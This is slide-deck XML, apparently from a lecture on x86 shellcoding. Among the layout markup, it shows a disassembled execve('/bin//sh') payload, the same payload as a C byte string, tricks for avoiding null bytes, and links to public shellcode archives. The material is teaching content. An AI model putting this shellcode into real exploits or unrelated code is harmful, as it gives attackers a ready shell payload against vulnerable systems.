            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1016000" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1015477" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015477" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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58401" y="1885186"/>
            <a:ext cx="358140" cy="290195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="358139" h="290194">
                <a:moveTo>
                  <a:pt x="0" y="290136"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="357910" y="290136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357910" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="290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2923" y="215180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0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180974" y="180974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1809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3898" y="2175322"/>
            <a:ext cx="97790" cy="208279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="97790" h="208280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="97697" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97697" y="208063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2080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1599" y="2175322"/>
            <a:ext cx="4104004" cy="208279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4104004" h="208280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4103418" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4103418" y="208063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2080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30223" y="1808983"/>
            <a:ext cx="440436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zeros out </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eax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00AFEF"/>
                </a:solidFill>
                <a:latin typeface="MS UI Gothic"/>
                <a:cs typeface="MS UI Gothic"/>
              </a:rPr>
              <a:t>⇒</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="290" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="MS UI Gothic"/>
                <a:cs typeface="MS UI Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x25\x4A\x4F\x4E\x45\x25\x35\x30\x31\x3A"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42923" y="2706268"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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01305" y="2706268"/>
            <a:ext cx="419100" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="418784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418784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20092" y="2706268"/>
            <a:ext cx="279400" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="279400" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="279186" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279186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99284" y="2706268"/>
            <a:ext cx="1396365" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1396364" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1395952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395952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86118" y="2706268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3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2923" y="3011068"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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01305" y="3011068"/>
            <a:ext cx="419100" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="418784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418784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20092" y="3011068"/>
            <a:ext cx="279400" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="279400" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="279186" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279186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9284" y="3011068"/>
            <a:ext cx="1396365" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1396364" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1395952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395952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30223" y="2628131"/>
            <a:ext cx="26765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9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax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2000" spc="-8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0x454e4f4a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax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2000" spc="-8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0x3a313035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42923" y="3618732"/>
            <a:ext cx="734695" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="734694" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="734423" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734423" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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77350" y="3618732"/>
            <a:ext cx="415925" cy="290195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="415925" h="290195">
                <a:moveTo>
                  <a:pt x="0" y="290136"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415317" y="290136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415317" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="290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92665" y="3618732"/>
            <a:ext cx="467995" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="467994" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="468000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468000" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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60670" y="3618732"/>
            <a:ext cx="359410" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="359410" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="359034" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359034" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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30223" y="3542530"/>
            <a:ext cx="2002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moves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eax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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>esp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42923" y="3867644"/>
            <a:ext cx="180975" cy="216535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="180975" h="216535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180974" y="216398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2163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3986" y="3907530"/>
            <a:ext cx="0" cy="217170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="217170">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="216988"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="40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4072" y="3908869"/>
            <a:ext cx="977265" cy="208279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="977264" h="208279">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="977005" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977005" y="208063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2080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30223" y="3850377"/>
            <a:ext cx="1223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FEF"/>
                </a:solidFill>
                <a:latin typeface="Yu Gothic"/>
                <a:cs typeface="Yu Gothic"/>
              </a:rPr>
              <a:t>⇒</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Yu Gothic"/>
                <a:cs typeface="Yu Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x50\x5C"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42923" y="4411240"/>
            <a:ext cx="698500" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="698500" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="697981" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697981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40902" y="4411240"/>
            <a:ext cx="139700" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="139700" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139598" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139598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80497" y="4411240"/>
            <a:ext cx="419100" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="418784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418784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14521" y="4411240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3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71720" y="4411240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3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2923" y="4716040"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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01305" y="4716040"/>
            <a:ext cx="279400" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="279400" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="279186" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279186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80497" y="4716040"/>
            <a:ext cx="419100" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="418784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418784" y="297360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2973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00122" y="5020839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3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2923" y="5323704"/>
            <a:ext cx="4427855" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4427855" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4427382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4427382" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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2923" y="5628503"/>
            <a:ext cx="3004185" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3004185" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3004035" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004035" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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30223" y="4333103"/>
            <a:ext cx="444500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9630" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>push	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax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849630" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pop	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp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Can generally do what you need to, but it’s  trickier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takes more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bytes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3" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE2841E-FCD1-4738-A99F-595CADB95FAB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3415505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5307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Reduce, Reuse,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Recycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2795359" y="3058328"/>
            <a:ext cx="3553460" cy="465455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3553460" h="465454">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3553265" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3553265" y="465085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4650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rgbClr val="00B0F0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0739" y="3972726"/>
            <a:ext cx="6062980" cy="465455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6062980" h="465454">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6062497" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062497" y="465085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4650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rgbClr val="00B0F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8040" y="2950379"/>
            <a:ext cx="6082665" cy="141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3000" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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http://shell-storm.org/</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="00B0F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000" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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http://www.exploit-db.com/shellcode/</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri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81C12250-02D6-4D0D-BA75-E77E5F2D988C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82060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3755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Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>x86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304800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14709" y="1540129"/>
            <a:ext cx="3041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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>8048060:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>_start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&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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4354" y="1993211"/>
          <a:ext cx="8353424" cy="4286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5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9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3374">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="2260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8048060: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60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31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260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c0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2465">
                        <a:lnSpc>
                          <a:spcPts val="2260"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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xor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260"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1089660" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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eax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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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eax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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048062: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50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2465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push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eax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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048063: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68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2f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2f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73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68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2465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push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0x68732f2f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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048068: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68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2f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62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69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6e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2465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push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0x6e69622f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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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804806d: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89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e3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2465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mov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485"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1089660" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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ebx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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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esp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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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804806f: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89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c1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2465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mov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485"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1089660" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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ecx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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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eax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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048071: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89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c2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2465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mov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485"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1089660" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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eax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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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edx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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048073: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b0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0b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2465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mov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485"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="922019" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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al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	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0x0b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49">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048075: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cd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80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2465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0x80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949">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048077: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31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c0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2465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xor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485"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1089660" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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eax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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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eax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949">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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8048079: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40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2465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inc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eax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374">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="78105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804807a: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cd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9BBA58"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>80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2465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485"/>
                        </a:lnSpc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0x80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02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4661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Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as a</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>String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2995086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="768131" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="849630" marR="5080" indent="-669925">
              <a:lnSpc>
                <a:spcPct val="122400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char shellcode[] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc0\x50\x68\x2f\x2f\x73"  "\x68\x68\x2f\x62\x69\x6e\x89"  "\xe3\x89\xc1\x89\xc2\xb0\x0b"  "\xcd\x80\x31\xc0\x40\xcd\x80"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr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210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3971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A5C409AB-39C5-4D8F-823A-4FFCE2807D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6676" y="488791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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="4800" dirty="0"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294798B5-A2FD-44AF-811A-0726AD3F72AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469539" y="2590800"/>
            <a:ext cx="3886200" cy="276606"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
